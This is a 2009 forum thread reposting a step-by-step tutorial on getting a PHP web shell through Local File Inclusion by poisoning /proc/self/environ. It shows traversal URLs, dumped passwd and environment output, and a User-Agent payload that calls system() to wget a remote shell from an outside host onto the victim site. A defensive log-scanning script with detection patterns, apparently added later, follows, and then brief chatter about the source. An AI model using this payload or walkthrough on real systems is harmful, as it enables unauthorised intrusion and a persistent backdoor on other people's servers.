ZeroCold, Posted September 26, 2009 (edited)

Shell via LFI - the proc/self/environ method

1 - Introduction
2 - Finding the LFI
3 - Checking whether proc/self/environ is accessible
4 - Injecting malicious code
5 - Accessing the shell
6 - Thanks

>> 1 - Introduction

In this tutorial I will show you how to get a shell on a site by using Local File Inclusion and injecting malicious code into proc/self/environ. It is a tutorial that explains everything step by step.

>> 2 - Finding the LFI

- Now let's find a site vulnerable to Local File Inclusion. I found a target, let's check it:

www.website.com/view.php?page=contact.php

- Now let's replace contact.php with ../ and the URL becomes

www.website.com/view.php?page=../

and we get an error:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

There is a good chance that we have a Local File Inclusion vulnerability. Let's move on.

- Let's check whether we can access etc/passwd, to see if it is vulnerable to Local File Inclusion. Let's make a request:

www.website.com/view.php?page=../../../etc/passwd

We get an error and the etc/passwd file is not included.

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

We go up a few directories:

www.website.com/view.php?page=../../../../../etc/passwd

We have successfully included the etc/passwd file.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

>> 3 - Checking whether proc/self/environ is accessible

- Now let's see whether proc/self/environ is accessible. We will replace etc/passwd with proc/self/environ:

www.website.com/view.php?page=../../../...lf/environ

If you get something like

DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

then proc/self/environ is accessible. If you get a blank page or an error, it means it is not accessible or the operating system is FreeBSD.

>> 4 - Injecting malicious code

- Now let's inject our malicious code into proc/self/environ. How can we do that? We inject the code into the User-Agent HTTP header. Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data and make a request to the URL:

www.website.com/view.php?page=../../../ ... lf/environ

Choose Tamper and in the User-Agent field write the following code:

<?system('wget hack-bay.com -O shell.php');?>

Then submit the request. Our command will be executed through the system() function (it will download a txt shell from the address http://hack-bay.com/Shells/gny.txt and save it as shell.php in the site's directory), and our shell will be created. If it doesn't work, try exec(), because system() may be restricted on the server in php.ini.

>> 5 - Accessing the shell

- Now let's check whether our malicious code was injected successfully. Let's see if the shell is present:

www.website.com/shell.php

Our shell is there. The injection was carried out successfully.

Source: insecurity.ro ; Author: SirGod

Edited September 26, 2009 by ZeroCold
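A defender's view of the requests described in this post, as an added example that is not part of the original thread: a Python scan of web access logs for the traversal sequence, the proc/self/environ include, and PHP tags in the User-Agent header. The log lines are constructed samples; the combined log format and the names fully_decode, classify and scan are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Apache/Nginx "combined" log format is assumed here.
LOG_RE = re.compile(
    r'\S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<agent>(?:[^"\\]|\\.)*)"')
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")
ENVIRON_RE = re.compile(r"proc/self/environ", re.I)
PHP_TAG_RE = re.compile(r"<\?")  # no legitimate browser sends this in a User-Agent

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252e%252e -> ..) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the set of findings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return set()
    uri = fully_decode(m.group("uri"))
    findings = set()
    if TRAVERSAL_RE.search(uri):
        findings.add("path-traversal")
    if ENVIRON_RE.search(uri):
        findings.add("proc-environ-include")
    if PHP_TAG_RE.search(m.group("agent")):
        findings.add("php-in-user-agent")
    return findings

def scan(lines):
    """Return (line_no, findings) for every line that triggers a rule."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [26/Sep/2009:10:00:01 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 512 "-" "Opera/9.80"',
    '203.0.113.7 - - [26/Sep/2009:10:00:09 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 901 "-" "Opera/9.80"',
    '203.0.113.7 - - [26/Sep/2009:10:00:30 +0000] "GET /view.php?page=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 1400 "-" "<?php echo 1;?>"',
    '203.0.113.9 - - [26/Sep/2009:10:02:00 +0000] "GET /view.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 300 "-" "Opera/9.80"',
]
```

Log hits only show that the attempt happened; the durable fix is in view.php itself, mapping the page parameter to a fixed allowlist of files instead of passing it to include().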
Guest Praetorian, Posted September 26, 2009
Very simple.. I'm going to go get myself a loaf of bread!
Adso, Posted September 26, 2009
http://rstcenter.com/forum/16425-shell-prin-lfi-metoda-proc-self-environ.rst
dRuNNNk, Posted September 26, 2009
I've seen it before on rst, anyway it's made by sirgod
Adso, Posted September 26, 2009
> I've seen it before on rst, anyway it's made by sirgod
A two-bit reply; you didn't say anything, in fact you repeated what I posted and his source!
dRuNNNk, Posted September 26, 2009
Sorry, I didn't notice that you had written it too
ZeroCold (Author), Posted September 26, 2009
> http://rstcenter.com/forum/16425-shell-prin-lfi-metoda-proc-self-environ.rst
I didn't see that one, but anyway this one here stands out more. And... yes, it's made by sirgod; I put the author and source at the end